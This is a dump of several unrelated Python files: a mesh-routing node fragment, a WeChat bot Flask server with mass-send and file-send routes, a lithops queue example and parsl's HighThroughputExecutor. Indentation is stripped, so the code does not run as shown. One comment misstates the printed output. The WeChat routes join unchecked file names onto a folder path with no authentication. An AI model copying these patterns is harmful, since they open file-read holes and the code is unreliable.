self.check_peers(source_peer_id, target_peer_id)
if not self.routing_table.check_connect_request_entry_already_exists(source_peer_id, target_peer_id):
self.routing_table.add_connect_request(source_peer_id, target_peer_id)
end_node = self.routing_table.get_address_of_peer(target_peer_id)
route = self.routing_table.get_best_route_for_destination(end_node)
if len(route) == 0:
logging.info(
'could not find a route to {}. Sending route request...'.format(end_node))
if self.send_route_request_message(end_node):
route = self.routing_table.get_best_route_for_destination(end_node)
else:
logging.info('Got no answer on route requested.'.format(end_node))
return
self.send_header(ConnectRequestHeader(None, variables.MY_ADDRESS, variables.DEFAULT_TTL, end_node,
route['next_node'], source_peer_id, target_peer_id,
timeout_in_sec).get_header_str())
def send_disconnect_request_header(self, source_peer_id, target_peer_id):
"""
sends disconnect request
:param source_peer_id: peer id of source peer
:param target_peer_id: peer id of target peer
"""
self.check_peers(source_peer_id, target_peer_id)
end_node = self.routing_table.get_address_of_peer(target_peer_id)
route = self.routing_table.get_best_route_for_destination(end_node)
if len(route) == 0:
logging.info(f'could not find a route to {end_node}. Sending route request...')
if self.send_route_request_message(end_node):
route = self.routing_table.get_best_route_for_destination(end_node)
else:
logging.info(f'Got no answer on route requested for end node: {end_node}')
return
self.send_header(DisconnectRequestHeader(None, variables.MY_ADDRESS, variables.DEFAULT_TTL, end_node,
route['next_node'], source_peer_id, target_peer_id).get_header_str())
def check_peers(self, source_peer_id, target_peer_id):
"""
helper function to check whether peers are already registered; raises ValueError if peer is not registered
:param source_peer_id: peer id of source peer
:param target_peer_id: peer id of target peer
"""
if not self.routing_table.check_peer_is_already_registered(source_peer_id):
raise ValueError(f"source peer '{source_peer_id}' is not registered")
elif not self.routing_table.check_peer_is_already_registered(target_peer_id):
raise ValueError(f"target peer '{target_peer_id}' is not registered")
elif self.routing_table.get_address_of_peer(source_peer_id) != variables.MY_ADDRESS:
raise ValueError('source peer is not registered on this node')
def send_registration_message(self, subscribe, peer_id):
"""
function to registers/unregister a peer
:param subscribe: if True peer will be registered on network; else the peer will be unregistered
:param peer_id: id of peer
"""
if subscribe:
self.routing_table.add_peer(peer_id, variables.MY_ADDRESS)
else:
self.routing_table.delete_peer(peer_id, variables.MY_ADDRESS)
attempts = 0
received_own_request = False
self.received_own_registration_message = False
while attempts < 3:
self.send_header(RegistrationHeader(None, variables.MY_ADDRESS, variables.DEFAULT_TTL, subscribe,
peer_id).get_header_str())
check_attempt_count = 0
while check_attempt_count < 5:
if self.received_own_registration_message:
received_own_request = True
break
else:
check_attempt_count += 1
time.sleep(0.5)
attempts += 1
if received_own_request:
return
def stop(self):
"""
function to shutdown background threads:
thread for reading from serial port
thread for writing to serial port
thread for processing received header messages
"""
self.PROCESS_INCOMING_MESSAGES = False
serial_connection.WRITING_THREAD_ACTIVE = False
serial_connection.READING_THREAD_ACTIVE = False
def add_message_to_waiting_acknowledgement_list(self, message_header_obj):
"""
adds the message id of a message to the list of pending acknowledgements
:param message_header_obj: message as object of class MessageHeader
"""
message_id = message_header_obj.message_id
logging.debug(f"adding '{message_id}' to ack list")
self.MESSAGES_ACKNOWLEDGMENT.append(message_id)
def delete_from_ack_list(self, ack_id):
"""
remove message id from list of pending acknowledgements
:param ack_id: message id which should be deleted
"""
logging.debug(f'remove {ack_id} from ack list')
try:
self.MESSAGES_ACKNOWLEDGMENT.remove(int(ack_id))
except ValueError:
logging.debug(f'ack is not in list. Current ack list: {self.MESSAGES_ACKNOWLEDGMENT}')
@contextmanager
def timeout(time_in_sec):
"""
could be used as context manager to run code snippet until a custom timeout; calls raise_timeout function after
timeout
:param time_in_sec: specifies timeout in seconds
"""
# Register a function to raise a TimeoutError on the signal.
signal.signal(signal.SIGALRM, raise_timeout)
# Schedule the signal to be sent after ``time``.
signal.alarm(time_in_sec)
try:
yield
except TimeoutError:
pass
finally:
# Unregister the signal so it won't be triggered
# if the timeout is not reached.
signal.signal(signal.SIGALRM, signal.SIG_IGN)
def raise_timeout(signum, frame):
"""
raises TimeoutError; is called by timeout context manager; to change timeout behavior edit code in this function
"""
raise TimeoutError
def wait_random_time():
"""
sleep for a random time; timespan is between 0 and variables.MAX_SLEEP_TIME seconds
"""
sleep_time = random.uniform(0, variables.MAX_SLEEP_TIME)
logging.debug('waiting {} seconds before sending'.format(sleep_time))
time.sleep(sleep_time)
|
weixin_bot.py
|
#!/usr/bin/env python
# coding: utf-8
#===================================================
from wechat import WeChat
from wechat.utils import *
from wx_handler import WeChatMsgProcessor
from wx_handler import Bot
from db import SqliteDB
from db import MysqlDB
from config import ConfigManager
from config import Constant
from config import Log
#---------------------------------------------------
from flask import Flask, render_template, send_file, jsonify, request
import threading
import traceback
import os
import logging
import time
#===================================================
cm = ConfigManager()
db = SqliteDB(cm.getpath('database'))
# db = MysqlDB(cm.mysql())
wechat_msg_processor = WeChatMsgProcessor(db)
wechat = WeChat(cm.get('wechat', 'host'))
wechat.db = db
wechat.bot = Bot()
wechat.msg_handler = wechat_msg_processor
wechat_msg_processor.wechat = wechat
PORT = int(cm.get('setting', 'server_port'))
app = Flask(__name__, template_folder='flask_templates')
app.config['UPLOAD_FOLDER'] = cm.getpath('uploaddir')
logger = logging.getLogger('werkzeug')
log_format_str = Constant.SERVER_LOG_FORMAT
formatter = logging.Formatter(log_format_str)
flask_log_handler = logging.FileHandler(cm.getpath('server_log_file'))
flask_log_handler.setLevel(logging.INFO)
flask_log_handler.setFormatter(formatter)
logger.addHandler(flask_log_handler)
app.logger.addHandler(flask_log_handler)
@app.route('/')
def index():
return render_template(Constant.SERVER_PAGE_INDEX)
@app.route('/qrcode')
def qrcode():
qdir = cm.getpath('qrcodedir')
if not os.path.exists(qdir):
os.makedirs(qdir)
image_path = '%s/%s_%d.png' % (qdir, wechat.uuid, int(time.time()*100))
s = wechat.wx_conf['API_qrcode'] + wechat.uuid
str2qr_image(s, image_path)
return send_file(image_path, mimetype='image/png')
@app.route("/group_list")
def group_list():
"""
@brief list groups
"""
result = wechat.db.select(Constant.TABLE_GROUP_LIST())
return jsonify({'count': len(result), 'group': result})
@app.route('/group_member_list/<g_id>')
def group_member_list(g_id):
"""
@brief list group member
@param g_id String
"""
result = wechat.db.select(Constant.TABLE_GROUP_USER_LIST(), 'RoomID', g_id)
return jsonify({'count': len(result), 'member': result})
@app.route('/group_chat_log/<g_name>')
def group_chat_log(g_name):
"""
@brief list group chat log
@param g_name String
"""
result = wechat.db.select(Constant.TABLE_GROUP_MSG_LOG, 'RoomName', g_name)
return jsonify({'count': len(result), 'chats': result})
@app.route('/upload', methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1] in Constant.SERVER_UPLOAD_ALLOWED_EXTENSIONS
j = {'ret': 1, 'msg': ''}
# check if the post request has the file part
if 'file' not in request.files:
j['msg'] = 'No file part'
return jsonify(j)
# if user does not select file, browser also
# submit a empty part without filename
file = request.files['file']
if file.filename == '':
j['msg'] = 'No selected file'
elif file and allowed_file(file.filename):
filename = generate_file_name(file.filename)
file_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)
file.save(file_path)
j['ret'] = 0
j['msg'] = filename
else:
j['msg'] = 'File type not support'
return jsonify(j)
else:
return render_template(Constant.SERVER_PAGE_UPLOAD)
@app.route('/send_msg/<to>/<msg>')
def send_msg(to, msg):
"""
@brief send message to user or gourp
@param to: String, user id or group id
@param msg: String, words
"""
return jsonify({'ret': 0 if wechat.send_text(to, msg) else 1})
@app.route('/send_img/<to>/<img>')
def send_img(to, img):
"""
@brief send image to user or gourp
@param to: String, user id or group id
@param img: String, image file name
"""
img_path = os.path.join(app.config['UPLOAD_FOLDER'], img)
return jsonify({'ret': 0 if wechat.send_img(to, img_path) else 1})
@app.route('/send_emot/<to>/<emot>')
def send_emot(to, emot):
"""
@brief send emotion to user or gourp
@param to: String, user id or group id
@param emot: String, emotion file name
"""
emot_path = os.path.join(app.config['UPLOAD_FOLDER'], emot)
return jsonify({'ret': 0 if wechat.send_emot(to, emot_path) else 1})
@app.route('/send_file/<to>/<file>')
def send_file(to, file):
"""
@brief send file to user or gourp
@param to: String, user id or group id
@param file: String, file name
"""
file_path = os.path.join(app.config['UPLOAD_FOLDER'], file)
return jsonify({'ret': 0 if wechat.send_file(to, file_path) else 1})
def mass_send(method, data, func):
j = {'ret': -1, 'unsend_list':[]}
if method == 'POST' and data:
to_list = data['to_list']
msg = data['msg']
media_type = data.get('media_type', '')
if media_type in ['img', 'emot']:
file_path = os.path.join(app.config['UPLOAD_FOLDER'], msg)
response = wechat.webwxuploadmedia(file_path)
if response is not None:
msg = response['MediaId']
elif media_type == 'file':
file_path = os.path.join(app.config['UPLOAD_FOLDER'], msg)
data = {
'appid': Constant.API_WXAPPID,
'title': msg,
'totallen': '',
'attachid': '',
'type': wechat.wx_conf['APPMSGTYPE_ATTACH'],
'fileext': msg.split('.')[-1],
}
response = wechat.webwxuploadmedia(file_path)
if response is not None:
data['totallen'] = response['StartPos']
data['attachid'] = response['MediaId']
else:
Log.error('File upload error')
msg = data
for groups in split_array(to_list, 20):
for g in groups:
r = func(g, msg)
if not r:
j['unsend_list'].append(g)
time.sleep(1)
j['ret'] = len(j['unsend_list'])
return j
@app.route('/mass_send_msg/', methods=["GET", "POST"])
def mass_send_msg():
"""
@brief send text to mass users or gourps
"""
j = mass_send(request.method, request.json, wechat.send_text)
return jsonify(j)
@app.route('/mass_send_img', methods=["GET", "POST"])
def mass_send_img():
"""
@brief send iamge to mass users or gourps
"""
j = mass_send(request.method, request.json, wechat.webwxsendmsgimg)
return jsonify(j)
@app.route('/mass_send_emot', methods=["GET", "POST"])
def mass_send_emot():
"""
@brief send emoticon to mass users or gourps
"""
j = mass_send(request.method, request.json, wechat.webwxsendemoticon)
return jsonify(j)
@app.route('/mass_send_file', methods=["GET", "POST"])
def mass_send_file():
"""
@brief send file to mass users or gourps
"""
j = mass_send(request.method, request.json, wechat.webwxsendappmsg)
return jsonify(j)
def run_server():
app.run(port=PORT)
if cm.get('setting', 'server_mode') == 'True':
serverProcess = threading.Thread(target=run_server)
serverProcess.start()
while True:
try:
wechat.start()
except KeyboardInterrupt:
echo(Constant.LOG_MSG_QUIT)
wechat.exit_code = 1
else:
Log.error(traceback.format_exc())
finally:
wechat.stop()
if wechat.exit_code == 0:
echo(Constant.MAIN_RESTART)
else:
# kill process
os.system(Constant.LOG_MSG_KILL_PROCESS % os.getpid())
|
simple_queue.py
|
from lithops.multiprocessing import Process, SimpleQueue
def f(q):
q.put([42, None, 'hello World'])
if __name__ == '__main__':
q = SimpleQueue()
p = Process(target=f, args=(q,))
p.start()
print(q.get()) # prints "[42, None, 'hello']"
p.join()
|
executor.py
|
from concurrent.futures import Future
import typeguard
import logging
import threading
import queue
import datetime
import pickle
from multiprocessing import Process, Queue
from typing import Dict # noqa F401 (used in type annotation)
from typing import List, Optional, Tuple, Union, Any
import math
from parsl.serialize import pack_apply_message, deserialize
from parsl.app.errors import RemoteExceptionWrapper
from parsl.executors.high_throughput import zmq_pipes
from parsl.executors.high_throughput import interchange
from parsl.executors.errors import (
BadMessage, ScalingFailed,
DeserializationError, SerializationError,
UnsupportedFeatureError
)
from parsl.executors.status_handling import StatusHandlingExecutor
from parsl.providers.provider_base import ExecutionProvider
from parsl.data_provider.staging import Staging
from parsl.addresses import get_all_addresses
from parsl.process_loggers import wrap_with_logs
from parsl.utils import RepresentationMixin
from parsl.providers import LocalProvider
logger = logging.getLogger(__name__)
class HighThroughputExecutor(StatusHandlingExecutor, RepresentationMixin):
"""Executor designed for cluster-scale
The HighThroughputExecutor system has the following components:
1. The HighThroughputExecutor instance which is run as part of the Parsl script.
2. The Interchange which is acts as a load-balancing proxy between workers and Parsl
3. The multiprocessing based worker pool which coordinates task execution over several
cores on a node.
4. ZeroMQ pipes connect the HighThroughputExecutor, Interchange and the process_worker_pool
Here is a diagram
.. code:: python
| Data | Executor | Interchange | External Process(es)
| Flow | | |
Task | Kernel | | |
+----->|-------->|------------>|->outgoing_q---|-> process_worker_pool
| | | | batching | | |
Parsl<---Fut-| | | load-balancing| result exception
^ | | | watchdogs | | |
| | | Q_mngmnt | | V V
| | | Thread<--|-incoming_q<---|--- +---------+
| | | | | |
| | | | | |
+----update_fut-----+
Each of the workers in each process_worker_pool has access to its local rank through
an environmental variable, ``PARSL_WORKER_RANK``. The local rank is unique for each process
and is an integer in the range from 0 to the number of workers per in the pool minus 1.
The workers also have access to the ID of the worker pool as ``PARSL_WORKER_POOL_ID``
and the size of the worker pool as ``PARSL_WORKER_COUNT``.
Parameters
----------
provider : :class:`~parsl.providers.provider_base.ExecutionProvider`
Provider to access computation resources. Can be one of :class:`~parsl.providers.aws.aws.EC2Provider`,
:class:`~parsl.providers.cobalt.cobalt.Cobalt`,
:class:`~parsl.providers.condor.condor.Condor`,
:class:`~parsl.providers.googlecloud.googlecloud.GoogleCloud`,
:class:`~parsl.providers.gridEngine.gridEngine.GridEngine`,
:class:`~parsl.providers.local.local.Local`,
:class:`~parsl.providers.sge.sge.GridEngine`,
:class:`~parsl.providers.slurm.slurm.Slurm`, or
:class:`~parsl.providers.torque.torque.Torque`.
label : str
Label for this executor instance.
launch_cmd : str
Command line string to launch the process_worker_pool from the provider. The command line string
will be formatted with appropriate values for the following values (debug, task_url, result_url,
cores_per_worker, nodes_per_block, heartbeat_period ,heartbeat_threshold, logdir). For example:
launch_cmd="process_worker_pool.py {debug} -c {cores_per_worker} --task_url={task_url} --result_url={result_url}"
address : string
An address to connect to the main Parsl process which is reachable from the network in which
workers will be running. This can be either a hostname as returned by ``hostname`` or an
IP address. Most login nodes on clusters have several network interfaces available, only
some of which can be reached from the compute nodes.
By default, the executor will attempt to enumerate and connect through all possible addresses.
Setting an address here overrides the default behavior.
default=None
worker_ports : (int, int)
Specify the ports to be used by workers to connect to Parsl. If this option is specified,
worker_port_range will not be honored.
worker_port_range : (int, int)
Worker ports will be chosen between the two integers provided.
interchange_port_range : (int, int)
Port range used by Parsl to communicate with the Interchange.
working_dir : str
Working dir to be used by the executor.
worker_debug : Bool
Enables worker debug logging.
managed : Bool
If this executor is managed by the DFK or externally handled.
cores_per_worker : float
cores to be assigned to each worker. Oversubscription is possible
by setting cores_per_worker < 1.0. Default=1
mem_per_worker : float
GB of memory required per worker. If this option is specified, the node manager
will check the available memory at startup and limit the number of workers such that
the there's sufficient memory for each worker. Default: None
max_workers : int
Caps the number of workers launched per node. Default: infinity
cpu_affinity: string
Whether or how each worker process sets thread affinity. Options are "none" to forgo
any CPU affinity configuration, "block" to assign adjacent cores to workers
(ex: assign 0-1 to worker 0, 2-3 to worker 1), and
"alternating" to assign cores to workers in round-robin
(ex: assign 0,2 to worker 0, 1,3 to worker 1).
prefetch_capacity : int
Number of tasks that could be prefetched over available worker capacity.
When there are a few tasks (<100) or when tasks are long running, this option should
be set to 0 for better load balancing. Default is 0.
address_probe_timeout : int | None
Managers attempt connecting over many different addesses to determine a viable address.
This option sets a time limit in seconds on the connection attempt.
Default of None implies 30s timeout set on worker.
heartbeat_threshold : int
Seconds since the last message from the counterpart in the communication pair:
(interchange, manager) after which the counterpart is assumed to be un-available. Default: 120s
heartbeat_period : int
Number of seconds after which a heartbeat message indicating liveness is sent to the
counterpart (interchange, manager). Default: 30s
poll_period : int
Timeout period to be used by the executor components in milliseconds. Increasing poll_periods
trades performance for cpu efficiency. Default: 10ms
worker_logdir_root : string
In case of a remote file system, specify the path to where logs will be kept.
"""
@typeguard.typechecked
def __init__(self,
label: str = 'HighThroughputExecutor',
provider: ExecutionProvider = LocalProvider(),
launch_cmd: Optional[str] = None,
address: Optional[str] = None,
worker_ports: Optional[Tuple[int, int]] = None,
worker_port_range: Optional[Tuple[int, int]] = (54000, 55000),
interchange_port_range: Optional[Tuple[int, int]] = (55000, 56000),
storage_access: Optional[List[Staging]] = None,
working_dir: Optional[str] = None,
worker_debug: bool = False,
cores_per_worker: float = 1.0,
mem_per_worker: Optional[float] = None,
max_workers: Union[int, float] = float('inf'),
cpu_affinity: str = 'none',
prefetch_capacity: int = 0,
heartbeat_threshold: int = 120,
heartbeat_period: int = 30,
poll_period: int = 10,
address_probe_timeout: Optional[int] = None,
managed: bool = True,
worker_logdir_root: Optional[str] = None):
logger.debug("Initializing HighThroughputExecutor")
StatusHandlingExecutor.__init__(self, provider)
self.label = label
self.launch_cmd = launch_cmd
self.worker_debug = worker_debug
self.storage_access = storage_access
self.working_dir = working_dir
self.managed = managed
self.blocks = {} # type: Dict[str, str]
self.block_mapping = {} # type: Dict[str, str]
self.cores_per_worker = cores_per_worker
self.mem_per_worker = mem_per_worker
self.max_workers = max_workers
self.prefetch_capacity = prefetch_capacity
self.address = address
self.address_probe_timeout = address_probe_timeout
if self.address:
self.all_addresses = address
else:
self.all_addresses = ','.join(get_all_addresses())
mem_slots = max_workers
cpu_slots = max_workers
if hasattr(self.provider, 'mem_per_node') and \
self.provider.mem_per_node is not None and \
mem_per_worker is not None and \
mem_per_worker > 0:
mem_slots = math.floor(self.provider.mem_per_node / mem_per_worker)
if hasattr(self.provider, 'cores_per_node') and \
self.provider.cores_per_node is not None:
cpu_slots = math.floor(self.provider.cores_per_node / cores_per_worker)
self.workers_per_node = min(max_workers, mem_slots, cpu_slots)
if self.workers_per_node == float('inf'):
self.workers_per_node = 1 # our best guess-- we do not have any provider hints
self._task_counter = 0
self.run_id = None # set to the correct run_id in dfk
self.hub_address = None # set to the correct hub address in dfk
self.hub_port = None # set to the correct hub port in dfk
self.worker_ports = worker_ports
self.worker_port_range = worker_port_range
self.interchange_port_range = interchange_port_range
self.heartbeat_threshold = heartbeat_threshold
self.heartbeat_period = heartbeat_period
self.poll_period = poll_period
self.run_dir = '.'
self.worker_logdir_root = worker_logdir_root
self.cpu_affinity = cpu_affinity
if not launch_cmd:
self.launch_cmd = ("process_worker_pool.py {debug} {max_workers} "
"-a {addresses} "
"-p {prefetch_capacity} "
"-c {cores_per_worker} "
"-m {mem_per_worker} "
"--poll {poll_period} "
"--task_port={task_port} "
"--result_port={result_port} "
"--logdir={logdir} "
"--block_id={{block_id}} "
"--hb_period={heartbeat_period} "
"{address_probe_timeout_string} "
"--hb_threshold={heartbeat_threshold} "
"--cpu-affinity {cpu_affinity} ")
def initialize_scaling(self):
""" Compose the launch command and call the scale_out
This should be implemented in the child classes to take care of
executor specific oddities.
"""
debug_opts = "--debug" if self.worker_debug else ""
max_workers = "" if self.max_workers == float('inf') else "--max_workers={}".format(self.max_workers)
address_probe_timeout_string = ""
if self.address_probe_timeout:
address_probe_timeout_string = "--address_probe_timeout={}".format(self.address_probe_timeout)
worker_logdir = "{}/{}".format(self.run_dir, self.label)
if self.worker_logdir_root is not None:
worker_logdir = "{}/{}".format(self.worker_logdir_root, self.label)
l_cmd = self.launch_cmd.format(debug=debug_opts,
prefetch_capacity=self.prefetch_capacity,
address_probe_timeout_string=address_probe_timeout_string,
addresses=self.all_addresses,
task_port=self.worker_task_port,
result_port=self.worker_result_port,
cores_per_worker=self.cores_per_worker,
mem_per_worker=self.mem_per_worker,
max_workers=max_workers,
nodes_per_block=self.provider.nodes_per_block,
heartbeat_period=self.heartbeat_period,
heartbeat_threshold=self.heartbeat_threshold,
poll_period=self.poll_period,
logdir=worker_logdir,
cpu_affinity=self.cpu_affinity)
self.launch_cmd = l_cmd
logger.debug("Launch command: {}".format(self.launch_cmd))
self._scaling_enabled = True
logger.debug("Starting HighThroughputExecutor with provider:\n%s", self.provider)
# TODO: why is this a provider property?
block_ids = []
if hasattr(self.provider, 'init_blocks'):
try:
block_ids = self.scale_out(blocks=self.provider.init_blocks)
except Exception as e:
logger.error("Scaling out failed: {}".format(e))
raise e
return block_ids
def start(self):
"""Create the Interchange process and connect to it.
"""
self.outgoing_q = zmq_pipes.TasksOutgoing("127.0.0.1", self.interchange_port_range)
self.incoming_q = zmq_pipes.ResultsIncoming("127.0.0.1", self.interchange_port_range)
self.command_client = zmq_pipes.CommandClient("127.0.0.1", self.interchange_port_range)
self.is_alive = True
self._queue_management_thread = None
self._start_queue_management_thread()
self._start_local_queue_process()
logger.debug("Created management thread: {}".format(self._queue_management_thread))
block_ids = self.initialize_scaling()
return block_ids
@wrap_with_logs
def _queue_management_worker(self):
"""Listen to the queue for task status messages and handle them.
Depending on the message, tasks will be updated with results, exceptions,
or updates. It expects the following messages:
.. code:: python
{
"task_id" : <task_id>
"result" : serialized result object, if task succeeded
... more tags could be added later
}
{
"task_id" : <task_id>
"exception" : serialized exception object, on failure
}
We do not support these yet, but they could be added easily.
.. code:: python
{
"task_id" : <task_id>
"cpu_stat" : <>
"mem_stat" : <>
"io_stat" : <>
"started" : tstamp
}
The `None` message is a die request.
"""
logger.debug("[MTHREAD] queue management worker starting")
while not self.bad_state_is_set:
try:
msgs = self.incoming_q.get(timeout=1)
except queue.Empty:
logger.debug("[MTHREAD] queue empty")
# Timed out.
pass
except IOError as e:
logger.exception("[MTHREAD] Caught broken queue with exception code {}: {}".format(e.errno, e))
return
except Exception as e:
logger.exception("[MTHREAD] Caught unknown exception: {}".format(e))
return
else:
if msgs is None:
logger.debug("[MTHREAD] Got None, exiting")
return
else:
for serialized_msg in msgs:
try:
msg = pickle.loads(serialized_msg)
tid = msg['task_id']
except pickle.UnpicklingError:
raise BadMessage("Message received could not be unpickled")
except Exception:
raise BadMessage("Message received does not contain 'task_id' field")
if tid == -1 and 'exception' in msg:
logger.warning("Executor shutting down due to exception from interchange")
exception = deserialize(msg['exception'])
self.set_bad_state_and_fail_all(exception)
break
elif tid == -1 and 'heartbeat' in msg:
continue
task_fut = self.tasks.pop(tid)
if 'result' in msg:
result = deserialize(msg['result'])
task_fut.set_result(result)
elif 'exception' in msg:
try:
s = deserialize(msg['exception'])
# s should be a RemoteExceptionWrapper... so we can reraise it
if isinstance(s, RemoteExceptionWrapper):
try:
s.reraise()
except Exception as e:
task_fut.set_exception(e)
elif isinstance(s, Exception):
task_fut.set_exception(s)
else:
raise ValueError("Unknown exception-like type received: {}".format(type(s)))
except Exception as e:
# TODO could be a proper wrapped exception?
task_fut.set_exception(
DeserializationError("Received exception, but handling also threw an exception: {}".format(e)))
else:
raise BadMessage("Message received is neither result or exception")
if not self.is_alive:
break
logger.info("[MTHREAD] queue management worker finished")
def _start_local_queue_process(self):
""" Starts the interchange process locally
Starts the interchange process locally and uses an internal command queue to
get the worker task and result ports that the interchange has bound to.
"""
comm_q = Queue(maxsize=10)
self.queue_proc = Process(target=interchange.starter,
args=(comm_q,),
kwargs={"client_ports": (self.outgoing_q.port,
self.incoming_q.port,
self.command_client.port),
"worker_ports": self.worker_ports,
"worker_port_range": self.worker_port_range,
"hub_address": self.hub_address,
"hub_port": self.hub_port,
"logdir": "{}/{}".format(self.run_dir, self.label),
"heartbeat_threshold": self.heartbeat_threshold,
"poll_period": self.poll_period,
"logging_level": logging.DEBUG if self.worker_debug else logging.INFO
},
daemon=True,
name="HTEX-Interchange"
)
self.queue_proc.start()
try:
(self.worker_task_port, self.worker_result_port) = comm_q.get(block=True, timeout=120)
except queue.Empty:
logger.error("Interchange has not completed initialization in 120s. Aborting")
raise Exception("Interchange failed to start")
def _start_queue_management_thread(self):
"""Method to start the management thread as a daemon.
Checks if a thread already exists, then starts it.
Could be used later as a restart if the management thread dies.
"""
if self._queue_management_thread is None:
logger.debug("Starting queue management thread")
self._queue_management_thread = threading.Thread(target=self._queue_management_worker, name="HTEX-Queue-Management-Thread")
self._queue_management_thread.daemon = True
self._queue_management_thread.start()
logger.debug("Started queue management thread")
else:
logger.debug("Management thread already exists, returning")
def hold_worker(self, worker_id):
"""Puts a worker on hold, preventing scheduling of additional tasks to it.
This is called "hold" mostly because this only stops scheduling of tasks,
and does not actually kill the worker.
Parameters
----------
worker_id : str
Worker id to be put on hold
"""
c = self.command_client.run("HOLD_WORKER;{}".format(worker_id))
logger.debug("Sent hold request to worker: {}".format(worker_id))
return c
@property
def outstanding(self):
outstanding_c = self.command_client.run("OUTSTANDING_C")
return outstanding_c
@property
def connected_workers(self):
workers = self.command_client.run("WORKERS")
return workers
@property
def connected_managers(self):
workers = self.command_client.run("MANAGERS")
return workers
def _hold_block(self, block_id):
""" Sends hold command to all managers which are in a specific block
Parameters
----------
block_id : str
Block identifier of the block to be put on hold
"""
managers = self.connected_managers
for manager in managers:
if manager['block_id'] == block_id:
logger.debug("[HOLD_BLOCK]: Sending hold to manager: {}".format(manager['manager']))
self.hold_worker(manager['manager'])
def submit(self, func, resource_specification, *args, **kwargs):
"""Submits work to the the outgoing_q.
The outgoing_q is an external process listens on this
queue for new work. This method behaves like a
submit call as described here `Python docs: <https://docs.python.org/3/library/concurrent.futures.html#concurrent.futures.ThreadPoolExecutor>`_
Args:
- func (callable) : Callable function
- args (list) : List of arbitrary positional arguments.
Kwargs:
- kwargs (dict) : A dictionary of arbitrary keyword args for func.
Returns:
Future
"""
if resource_specification:
logger.error("Ignoring the resource specification. "
"Parsl resource specification is not supported in HighThroughput Executor. "
"Please check WorkQueueExecutor if resource specification is needed.")
raise UnsupportedFeatureError('resource specification', 'HighThroughput Executor', 'WorkQueue Executor')
if self.bad_state_is_set:
raise self.executor_exception
self._task_counter += 1
task_id = self._task_counter
# handle people sending blobs gracefully
args_to_print = args
if logger.getEffectiveLevel() >= logging.DEBUG:
args_to_print = tuple([arg if len(repr(arg)) < 100 else (repr(arg)[:100] + '...') for arg in args])
logger.debug("Pushing function {} to queue with args {}".format(func, args_to_print))
fut = Future()
self.tasks[task_id] = fut
try:
fn_buf = pack_apply_message(func, args, kwargs,
buffer_threshold=1024 * 1024)
except TypeError:
raise SerializationError(func.__name__)
msg = {"task_id": task_id,
"buffer": fn_buf}
# Post task to the the outgoing queue
self.outgoing_q.put(msg)
# Return the future
return fut
@property
def scaling_enabled(self):
return self._scaling_enabled
def create_monitoring_info(self, status):
""" Create a msg for monitoring based on the poll status
"""
msg = []
for bid, s in status.items():
d = {}
d['run_id'] = self.run_id
d['status'] = s.status_name
d['timestamp'] = datetime.datetime.now()
d['executor_label'] = self.label
d['job_id'] = self.blocks.get(bid, None)
d['block_id'] = bid
msg.append(d)
return msg
def scale_out(self, blocks=1):
"""Scales out the number of blocks by "blocks"
"""
if not self.provider:
raise (ScalingFailed(None, "No execution provider available"))
block_ids = []
for i in range(blocks):
block_id = str(len(self.blocks))
try:
job_id = self._launch_block(block_id)
self.blocks[block_id] = job_id
self.block_mapping[job_id] = block_id
block_ids.append(block_id)
except Exception as ex:
self._fail_job_async(block_id,
"Failed to start block {}: {}".format(block_id, ex))
return block_ids
def _launch_block(self, block_id: str) -> Any:
if self.launch_cmd is None:
raise ScalingFailed(self.provider.label, "No launch command")
launch_cmd = self.launch_cmd.format(block_id=block_id)
job_id = self.provider.submit(launch_cmd, 1)
logger.debug("Launched block {}->{}".format(block_id, job_id))
if not job_id:
raise(ScalingFailed(self.provider.label,
"Attempts to provision nodes via provider has failed"))
return job_id
def scale_in(self, blocks=None, block_ids=[], force=True, max_idletime=None):
"""Scale in the number of active blocks by specified amount.
The scale in method here is very rude. It doesn't give the workers
the opportunity to finish current tasks or cleanup. This is tracked
in issue #530
Parameters
----------
blocks : int
Number of blocks to terminate and scale_in by
force : Bool
Used along with blocks to indicate whether blocks should be terminated by force.
When force = True, we will kill blocks regardless of the blocks being busy
When force = False, Only idle blocks will be terminated.
If the # of ``idle_blocks`` < ``blocks``, the list of jobs marked for termination
will be in the range: 0 - ``blocks``.
max_idletime: float
A time to indicate how long a block can be idle.
Used along with force = False to kill blocks that have been idle for that long.
block_ids : list
List of specific block ids to terminate. Optional
Returns
-------
List of job_ids marked for termination
"""
if block_ids:
block_ids_to_kill = block_ids
else:
managers = self.connected_managers
block_info = {}
for manager in managers:
if not manager['active']:
continue
b_id = manager['block_id']
if b_id not in block_info:
block_info[b_id] = [0, float('inf')]
block_info[b_id][0] += manager['tasks']
block_info[b_id][1] = min(block_info[b_id][1], manager['idle_duration'])
sorted_blocks = sorted(block_info.items(), key=lambda item: (item[1][1], item[1][0]))
if force is True:
block_ids_to_kill = [x[0] for x in sorted_blocks[:blocks]]
else:
if not max_idletime:
block_ids_to_kill = [x[0] for x in sorted_blocks if x[1][0] == 0][:blocks]
else:
block_ids_to_kill = []
for x in sorted_blocks:
if x[1][1] > max_idletime and x[1][0] == 0:
block_ids_to_kill.append(x[0])
if len(block_ids_to_kill) == blocks:
break
logger.debug("Selecting block ids to kill since they are idle : {}".format(
block_ids_to_kill))
logger.debug("Current blocks : {}".format(self.blocks))
# Hold the block
for block_id in block_ids_to_kill:
self._hold_block(block_id)
# Now kill via provider
# Potential issue with multiple threads trying to remove the same blocks
to_kill = [self.blocks[bid] for bid in block_ids_to_kill if bid in self.blocks]
r = self.provider.cancel(to_kill)
job_ids = self._filter_scale_in_ids(to_kill, r)
# to_kill block_ids are fetched from self.blocks
# If a block_id is in self.block, it must exist in self.block_mapping
block_ids_killed = [self.block_mapping[jid] for jid in job_ids]
return block_ids_killed
def _get_block_and_job_ids(self) -> Tuple[List[str], List[Any]]:
# Not using self.blocks.keys() and self.blocks.values() simultaneously
# The dictionary may be changed during invoking this function
# As scale_in and scale_out are invoked in multiple threads
block_ids = list(self.blocks.keys())
job_ids = [] # types: List[Any]
for bid in block_ids:
job_ids.append(self.blocks[bid])
return block_ids, job_ids
def shutdown(self, hub=True, targets='all', block=False):
"""Shutdown the executor, including all workers and controllers.
This is not implemented.
Kwargs:
- hub (Bool): Whether the hub should be shutdown, Default: True,
- targets (list of ints| 'all'): List of block id's to kill, Default: 'all'
- block (Bool): To block for confirmations or not
"""
logger.info("Attempting HighThroughputExecutor shutdown")
self.queue_proc.terminate()
logger.info("Finished HighThroughputExecutor shutdown attempt")
return True
|
predict.py
|
